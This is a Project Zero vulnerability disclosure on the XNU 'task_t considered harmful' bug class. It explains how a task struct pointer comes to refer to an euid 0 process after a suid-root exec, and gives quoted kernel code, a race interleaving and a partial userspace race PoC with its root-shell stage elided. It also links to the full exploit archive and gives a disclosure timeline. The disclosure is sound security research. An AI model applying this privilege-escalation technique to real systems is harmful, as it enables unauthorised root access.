Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=837
TL;DR
You cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
Many, many places in the kernel do this, and there are a great many very exploitable bugs as a result.
********
task_t is just a typedef for a task struct *. It's the abstraction level which represents a whole task
comprising threads and a virtual memory map.
task_t's have a corresponding mach port type (IKOT_TASK) known as a task port. The task port structure
in the kernel has a pointer to the task struct which it represents. If you have send rights to a task port then
you have control over its VM and, via task_threads, its threads.
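To make that concrete, here's a minimal sketch of the relationship (types and fields simplified; these are not the exact XNU definitions):

typedef struct task *task_t;    /* a task_t is literally just a task struct pointer */

struct ipc_port {
    ...
    unsigned int ip_kotype;     /* IKOT_TASK for a task port */
    void        *ip_kobject;    /* for an IKOT_TASK port: the task struct it represents */
    ...
};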
When a suid-root binary is executed the kernel invalidates the old task and thread port structures, setting their
object pointers to NULL and allocating new ports instead.
CVE-2016-1757 was a race condition concerning the order in which those port structures were invalidated during the
exec operation.
Although the issues I will describe in this bug report may seem similar, this is a completely different, and far worse,
bug class.
~~~~~~~~~
When a suid binary is executed it's true that the task's old task and thread ports get invalidated; however, the task
struct itself stays the same. There's no fork and no creation of a new task. This means that any pointers to that task struct
now point to the task struct of an euid 0 process.
There are lots of IOKit drivers which save task struct pointers as members; see my recent bug reports for some examples.
In those cases I reported there was another bug, namely that they weren't taking a reference on the task struct, meaning
that if we killed the corresponding task and then forked and exec'ed a suid-root binary we could get the IOKit object
to interact via the task struct pointer with the VM of an euid 0 process. (You could also break out of a sandbox by
forcing launchd to spawn a new service binary which would reuse the free'd task struct.)
However, looking more closely, even if those IOKit drivers *do* take a reference on the task struct it doesn't matter!
(at least not when there are suid binaries around.) Just because the userspace client of the user client had send rights
to a task port at time A when it passed that task port to IOKit doesn't mean that it still has send rights to it when
the IOKit driver actually uses the task struct pointer... In the case of IOSurface this lets us trivially map any RW area
of virtual memory in an euid 0 process into ours and write to it. (See the other exploit I sent for that IOSurface bug.)
There are a large number of IOKit drivers which do this (storing task struct pointers) and then either use them to manipulate
userspace VM (e.g. IOAcceleratorFamily2, IOThunderboltFamily, IOSurface) or rely on that task struct pointer to perform
authorization checks, like the code in IOHIDFamily.
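Distilled into a minimal sketch, the dangerous pattern common to these drivers looks like this (the function and variable names here are invented for illustration, not taken from any real driver):

/* time A: the client proves it holds a send right to a task port */
static task_t saved_task;

extern void manipulate_userspace_vm(task_t task);    /* hypothetical helper */

void
driver_set_target(ipc_port_t task_port)
{
    /* convert_port_to_task takes a reference, so there's no use-after-free */
    saved_task = convert_port_to_task(task_port);
}

/* time B: possibly much later */
void
driver_do_work(void)
{
    /* the reference pinned the allocation, but if the task exec'ed a
       suid-root binary in between, saved_task now points to the task
       struct of an euid 0 process */
    manipulate_userspace_vm(saved_task);
}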
Another interesting case to consider is task struct pointers on the stack.
In the MIG files for the user/kernel interface, task ports are subject to the following intran:
type task_t = mach_port_t
#if KERNEL_SERVER
    intran: task_t convert_port_to_task(mach_port_t)
#endif /* KERNEL_SERVER */
where convert_port_to_task is:
task_t
convert_port_to_task(
    ipc_port_t port)
{
    task_t task = TASK_NULL;

    if (IP_VALID(port)) {
        ip_lock(port);

        if (ip_active(port) &&
            ip_kotype(port) == IKOT_TASK) {
            task = (task_t)port->ip_kobject;
            assert(task != TASK_NULL);

            task_reference_internal(task);
        }

        ip_unlock(port);
    }

    return (task);
}
This converts the task port into the corresponding task struct pointer. It takes a reference on the task struct, but that only
makes sure that it doesn't get free'd, not that its euid doesn't change as the result of the exec of a suid-root binary.
As soon as that port lock is dropped the task could exec a suid-root binary, and although this task port would no longer be valid,
that task struct pointer would remain valid.
This leads to a huge number of interesting race conditions. Grep the source for all .defs files which take a task_t to find them all ;-)
In this exploit PoC I'll target perhaps the most interesting one: task_threads.
Let's look at how task_threads actually works, including the kernel code which is generated by MIG.
In task_server.c (an autogenerated file; build XNU first if you can't find this file):
    target_task = convert_port_to_task(In0P->Head.msgh_request_port);

    RetCode = task_threads(target_task, (thread_act_array_t *)&(OutP->act_list.address), &OutP->act_listCnt);
    task_deallocate(target_task);
This gives us back the task struct from the task port, then calls task_threads (unimportant bits removed):
kern_return_t
task_threads(
    task_t                  task,
    thread_act_array_t      *threads_out,
    mach_msg_type_number_t  *count)
{
    ...
    for (thread = (thread_t)queue_first(&task->threads); i < actual;
            ++i, thread = (thread_t)queue_next(&thread->task_threads)) {
        thread_reference_internal(thread);
        thread_list[j++] = thread;
    }
    ...
    for (i = 0; i < actual; ++i)
        ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
    ...
}
task_threads uses the task struct pointer to iterate through the list of threads, then creates send rights to them
which get sent back to user space. There are a few locks taken and dropped in here but they're irrelevant.
What happens if that task is exec'ing a suid-root binary at the same time?
The relevant parts of the exec code are these two points in ipc_task_reset and ipc_thread_reset:
void
ipc_task_reset(
    task_t task)
{
    ipc_port_t old_kport, new_kport;
    ipc_port_t old_sself;
    ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
    int i;

    new_kport = ipc_port_alloc_kernel();
    if (new_kport == IP_NULL)
        panic("ipc_task_reset");

    itk_lock(task);

    old_kport = task->itk_self;

    if (old_kport == IP_NULL) {
        itk_unlock(task);
        ipc_port_dealloc_kernel(new_kport);
        return;
    }

    task->itk_self = new_kport;
    old_sself = task->itk_sself;
    task->itk_sself = ipc_port_make_send(new_kport);

    ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE);    <-- point (1)
... then calls:
void
ipc_thread_reset(
    thread_t thread)
{
    ipc_port_t old_kport, new_kport;
    ipc_port_t old_sself;
    ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
    boolean_t has_old_exc_actions = FALSE;
    int i;

    new_kport = ipc_port_alloc_kernel();
    if (new_kport == IP_NULL)
        panic("ipc_task_reset");

    thread_mtx_lock(thread);

    old_kport = thread->ith_self;

    if (old_kport == IP_NULL) {
        thread_mtx_unlock(thread);
        ipc_port_dealloc_kernel(new_kport);
        return;
    }

    thread->ith_self = new_kport;    <-- point (2)
Point (1) clears out the task struct pointer from the old task port and allocates a new port for the task.
Point (2) does the same for the thread port.
Let's call the process which is doing the exec process B and the process doing task_threads() process A, and imagine
the following interleaving of execution:
Process A: target_task = convert_port_to_task(In0P->Head.msgh_request_port); // gets pointer to process B's task struct
Process B: ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); // process B invalidates the old task port so that it no longer has a task struct pointer
Process B: thread->ith_self = new_kport // process B allocates new thread ports and sets them up
Process A: ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); // process A reads and converts the *new* thread port objects!
Note that the fundamental issue here isn't this particular race condition but the fact that a task struct pointer can just
never ever be relied on to have the same euid as when you first got hold of it.
~~~~~~~~~~~~~~~
Exploit:
This PoC exploits exactly this race condition to get a thread port for an euid 0 process. Since we're the ones who exec'd it, I just stick a
ret-slide followed by a small ROP payload on the actual stack at exec time, then use the thread port to set RIP to a gadget
which does a large add rsp, X and pops a shell :)
Just run it for a while; it's quite a tight race window, but it will work! (Try a few instances in parallel.)
Tested on OS X 10.11.5 (15F34) on a MacBookAir5,2.
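For reference, the core of the race looks roughly like this from userspace (a simplified sketch, not the full PoC: error handling is omitted, "/usr/bin/suid_target" is a placeholder for any suid-root binary, the real exploit obtains the child's task port without task_for_pid's restrictions, and the win-detection plus thread_set_state/ROP stage is elided):

#include <mach/mach.h>
#include <mach/mach_traps.h>
#include <sys/wait.h>
#include <unistd.h>

int
main(void)
{
    for (;;) {
        pid_t child = fork();
        if (child == 0) {
            /* placeholder path: any suid-root binary will do */
            execl("/usr/bin/suid_target", "suid_target", (char *)NULL);
            _exit(1);
        }

        /* pre-exec the child still has our euid */
        mach_port_t task_port = MACH_PORT_NULL;
        task_for_pid(mach_task_self(), child, &task_port);

        /* hammer task_threads() so that, with luck, the kernel-side
           convert_port_to_task() runs before point (1) of the exec reset
           and convert_thread_to_port() runs after point (2) */
        kern_return_t kr;
        do {
            thread_act_array_t threads;
            mach_msg_type_number_t count = 0;
            kr = task_threads(task_port, &threads, &count);
            /* a winning call returns send rights to the threads of the
               now-euid-0 process; the real PoC detects this and uses
               thread_set_state() to point RIP at the ret-slide (thread
               ports from losing attempts should be deallocated; omitted) */
        } while (kr == KERN_SUCCESS);    /* fails once the stale port dies */

        mach_port_deallocate(mach_task_self(), task_port);
        waitpid(child, NULL, 0);    /* reap and retry */
    }
}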
######################################
A faster exploit which also defeats the mitigations shipped in MacOS 10.12. Should work for all kernel versions <= 10.12
######################################
Fixed: https://support.apple.com/en-us/HT207275
Disclosure timeline:
2016-06-02 - Ian Beer reports the "task_t considered harmful" issue to Apple.
2016-06-30 - Apple requests a 60-day disclosure extension.
2016-07-12 - Project Zero declines the disclosure extension request.
2016-07-19 - Meeting with Apple to discuss the disclosure timeline.
2016-07-21 - Follow-up meeting with Apple to discuss the disclosure timeline.
2016-08-10 - Meeting with Apple to discuss the proposed fix and disclosure timeline.
2016-08-15 - Project Zero confirms the publication date will be September 21; Apple acknowledges.
2016-08-29 - Meeting with Apple to discuss technical details of (1) a "short-term mitigation" that will be shipped within the disclosure deadline, and (2) a "long-term fix" that will be shipped after the disclosure deadline.
2016-09-13 - Apple releases the "short-term mitigation" for iOS 10.
2016-09-13 - Apple requests a restriction on disclosed technical details to only those parts of the issue covered by the short-term mitigation.
2016-09-14 - Project Zero confirms that it will disclose full details without restriction.
2016-09-16 - Apple repeats its request to withhold details from the disclosure; Project Zero confirms it will disclose full details.
2016-09-17 - Apple requests that Project Zero delay disclosure until a security update in October.
2016-09-18 - Apple's senior leadership contacts Google's senior leadership to request that Project Zero delay disclosure of the task_t issue.
2016-09-19 - Google grants a 5-week flexible disclosure extension.
2016-09-20 - Apple releases a "short-term mitigation" for the task_t issue for MacOS 10.12.
2016-09-21 - Planned publication date passes.
2016-10-03 - Apple publicly releases the long-term fix for the task_t issue in MacOS beta release 10.12.1 beta 3.
2016-10-24 - Apple releases MacOS version 10.12.1.
2016-10-25 - Disclosure date of "task_t considered harmful".
Project Zero remains committed to a 90-day disclosure window, and will continue to apply disclosure deadlines to all of our vulnerability research findings. A 14-day grace extension is available for cases where a patch is expected shortly after the 90-day window.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40669.zip